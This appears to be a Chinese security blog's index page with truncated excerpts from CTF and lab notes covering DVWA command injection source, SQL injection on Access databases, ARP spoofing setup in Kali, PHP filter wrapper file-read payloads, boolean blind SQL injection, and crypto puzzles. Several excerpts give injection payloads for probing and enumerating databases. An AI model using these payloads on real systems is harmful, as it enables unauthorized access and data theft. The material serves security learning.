靶场
#DVWA靶场(medium)
Command Injection源代码:
1234567891011121314151617181920212223242526272829303132Command Injection Sourcevulnerabilities/exec/source/medium.php<?phpif( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Set blacklist $substitutions = array( '&&' => '', ';' => '', ); // Remove any of the charactars in the array (blacklist). $target = str_repl ...
渗透
sql 注入access数据库:Access数据库是一种小型数据库用于储存数据,其中各个对象之间可以建立关联,方便用户快速查询与调用数据。它相对其他数据库来说比较简单,只有==一个数据库==,里面存放着表、列以及数据,通过简单的语句就可以完成注入。
123456789结构:数据库名 表名 列名 数据
联合注入
1, 判断注入点,一般来说单引号、减号、and等就可以判断是否存在注入
12?id=1' //通过单引号看是否报错,根据报错信息,判断数据库闭合方式?id=2-1 //返回与id=2不同的页面说明带入数据库执行,存在注入
2, 通过order by 判断字段数,将字段数从小到大以此类推,直至返回错误页面,而正确的字段数就是返回错误的字段数减一
123?id=1 order by 1 ...?id=1 order by 10 //如果报错则字段为9
3, 通过联合查询
123select * from article where id= ...
kali
arp欺骗首先要进行攻击他人,则我们要把虚拟机和物理机的网络环境配置一样
打开虚拟机,把网络连接改为桥接模式
在vm的左上方点击编辑,再点击虚拟网络编辑器
再点击更改设置
已桥接至改为物理机的网络适配器(查看一下物理机的网络属性就可以得到)
配置kali的IP,默认网关,子网掩码。
在物理机查看ip ,默认网关,子网掩码。
可以得到物理机的ip: 192.168.120.237
子网掩码: 255.255.255.0
默认网关: 192.168.120.4
接下来在kali终端输入 vim /etc/network/interfaces
把kali的IP和物理机的IP设置在同一个网段
之后按Esc 再按:wq(保存退出)
配置dns 在kali终端输入 vim /etc/network/resolv.conf
保存退出
最后重启网络服务 sudo service networking restart
就在同一 ...
攻防世界刷题
cat‘s gift题目描述:于礼物不好拿,所以猫猫把礼物平均分成了四份,但是其中一份不小心掉在地上散落成了无数片,变成了 1 - 1/3 + 1/5 - 1/7 + …
题目分析:提示莱布尼茨公式,平均分成四份,告诉了一份的内容,写代码把它无限逼近乘上4,就大概还原了。
代码:
123456789def pi(n): s = 0 for i in range(n): s+=(-1)**i*1/(2*i+1) return 4*sprint(pi(1000000))#3.1415916535897743#CatCTF{pie}
xor 很心疼你题目描述:
1234567891011121314151617181920212223242526272829303132333435363738# Python3from secret import flagimport randomimport base64pool = 'qwertyuiopasdfghjklzxcvbnm1234567890QWE ...
无题
buuctf web####[ACTF2020 新生赛]Include 1【文件包含】【读取代码】
#####php伪协议:
php伪协议实现命令执行,任意文件读取:(php://filter 的使用)
构造payload
php://filter/read=convert.base64-encode/resource=[文件名]
所以根据题目:构造payload:?file=php://filter/read=convert.base64-encode/resource=flag.php
#命令行注入
postweb注入
bool盲注复现###思路:
####1.得到数据库的名称
爆破数据库名称长度:
11/if(length(database())!=1,1,0)
响应:
1Content-Length: 1059
如果代码有误,则不会是1059长度
设置变量:
11/if(length(database())=§1§,1,0)
可知长度为10
爆破数据库名称:
11/if(mid(database(),2,1)!='r',1,0)
响应:
1Content-Length: 1059
放入intruder设置变量:
11/if(mid(database(),§2§,1)='§r§',1,0)
可知 库为:stormgroup
####2.已知库求表的长度和表的名称:
11/if(length((select group_concat(table_name) from information_schema.tables where table_schema='stormgroup'))!=56,1,0)
响应:
1Cont ...
bugku1
变异摩斯密码##easy crypto
题目如下:
10010 0100 01 110 1111011 11 11111 010 000 0 001101 1010 111 100 0 001101 01111 000 001101 00 10 1 0 010 0 000 1 01111 10 11110 101011 1111101
就是把”.”换为0,把”-“换成1
脚本如下:
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667dst_dict = {'.-': 'A', '-...': 'B', '-.-.': 'C', '-..': 'D', ...
复现
羊城杯 esay rsa题目:
output:
12345678910111265439077968397540989065489337415940784529269429684649365065378651353483030304843439003949649543376311871845618819107350646437252980144978447924976470943930075812834237368425374578215977641265884859875440799334807607478705932175148673160353577875890074101393042506714001617338265284910381849259298772642190619868432354268235450174220143989167809090620534567902563923049735485174891329846676796373864169484099307961623778445258299683175857499560571499305235474632 ...
ECC
ECC
buuctf2
#强国杯babyrsa
题目:
1234p=141755878485521250585193526506481835647909733133264484491826506533095411036871187581787386511037412174342774745629361598256663156186634190655768748475210357241858257598757038958971434010720283092093970656262829235604751943313758736375629372244903654343619477366460118493729379823214225182978297539467629343751q=10579132676735025436177508519878951260128003466787801873620348269029640293070510588094129231152349153126821992030410570794681788138523920106071934526617693501444898172 ...